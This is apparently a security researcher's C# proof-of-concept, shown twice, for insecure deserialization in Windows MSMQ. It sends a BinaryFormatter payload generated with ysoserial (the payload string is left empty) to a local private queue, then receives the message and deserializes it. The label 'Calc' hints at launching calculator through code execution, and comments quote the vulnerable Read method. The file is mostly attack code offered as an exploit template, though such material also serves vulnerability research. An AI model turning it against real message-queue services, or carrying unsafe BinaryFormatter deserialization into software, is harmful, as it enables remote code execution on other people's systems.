moohax/BinaryMessageFormatter.cs

## BinaryMessageFormatter.cs
//
// Enable MSMQ in "Turn Windows Features on or off"
// Open "Computer Management -> Services and Applications -> Message Queueing -> (Right click) Private Queue -> New"
// There are differences between domain joined vs non queues
//
// System.Messaging.BinaryMessageFormatter
// public BinaryMessageFormatter()
// {
//    this.formatter = new BinaryFormatter();
// }
//
// System.Messaging.BinaryMessageFormatter.Read(Message)
// public object Read(Message message)
// {
//    if (message == null)
//    {
//        throw new ArgumentNullException("message");
//    }
//    int bodyType = message.BodyType;
//    if (bodyType == 768)
//    {
//        Stream bodyStream = message.BodyStream;
//        return this.formatter.Deserialize(bodyStream);
//    }
//    throw new InvalidOperationException(Res.GetString("InvalidTypeDeserialization"));
// }

using System;
using System.Messaging;
using System.IO;

class Program
{
    static void Main(string[] args)
    {
        // Binary formatter payload (I use ysoserial)
        string payload = "";

        // Create queue
        MessageQueue queue = new MessageQueue(".\\private$\\Queue");
        queue.Formatter = new BinaryMessageFormatter();
        byte[] fun = Convert.FromBase64String(payload);
        MemoryStream ms = new MemoryStream();
        ms.Write(fun, 0, fun.Length);

        // Create and send message the queue
        Message msg = new Message();
        msg.BodyStream = ms;
        msg.Label = "Calc";
        msg.BodyType = 768;
        queue.Send(msg);

        // Server
        MessageQueue outQueue = new MessageQueue(".\\private$\\orderqueue");
        outQueue.Formatter = new BinaryMessageFormatter();
        Message outMsg = outQueue.Receive();

        // Read malicious message
        outMsg.Formatter.Read(outMsg);
        Console.WriteLine("Press any key to stop...");
        Console.ReadKey();
    }
}
	//
	// Enable MSMQ in "Turn Windows Features on or off"
	// Open "Computer Management -> Services and Applications -> Message Queueing -> (Right click) Private Queue -> New"
	// There are differences between domain joined vs non queues
	//
	// System.Messaging.BinaryMessageFormatter
	// public BinaryMessageFormatter()
	// {
	// this.formatter = new BinaryFormatter();
	// }
	//
	// System.Messaging.BinaryMessageFormatter.Read(Message)
	// public object Read(Message message)
	// {
	// if (message == null)
	// {
	// throw new ArgumentNullException("message");
	// }
	// int bodyType = message.BodyType;
	// if (bodyType == 768)
	// {
	// Stream bodyStream = message.BodyStream;
	// return this.formatter.Deserialize(bodyStream);
	// }
	// throw new InvalidOperationException(Res.GetString("InvalidTypeDeserialization"));
	// }

	using System;
	using System.Messaging;
	using System.IO;

	class Program
	{
	static void Main(string[] args)
	{
	// Binary formatter payload (I use ysoserial)
	string payload = "";

	// Create queue
	MessageQueue queue = new MessageQueue(".\\private$\\Queue");
	queue.Formatter = new BinaryMessageFormatter();
	byte[] fun = Convert.FromBase64String(payload);
	MemoryStream ms = new MemoryStream();
	ms.Write(fun, 0, fun.Length);

	// Create and send message the queue
	Message msg = new Message();
	msg.BodyStream = ms;
	msg.Label = "Calc";
	msg.BodyType = 768;
	queue.Send(msg);

	// Server
	MessageQueue outQueue = new MessageQueue(".\\private$\\orderqueue");
	outQueue.Formatter = new BinaryMessageFormatter();
	Message outMsg = outQueue.Receive();

	// Read malicious message
	outMsg.Formatter.Read(outMsg);
	Console.WriteLine("Press any key to stop...");
	Console.ReadKey();
	}
	}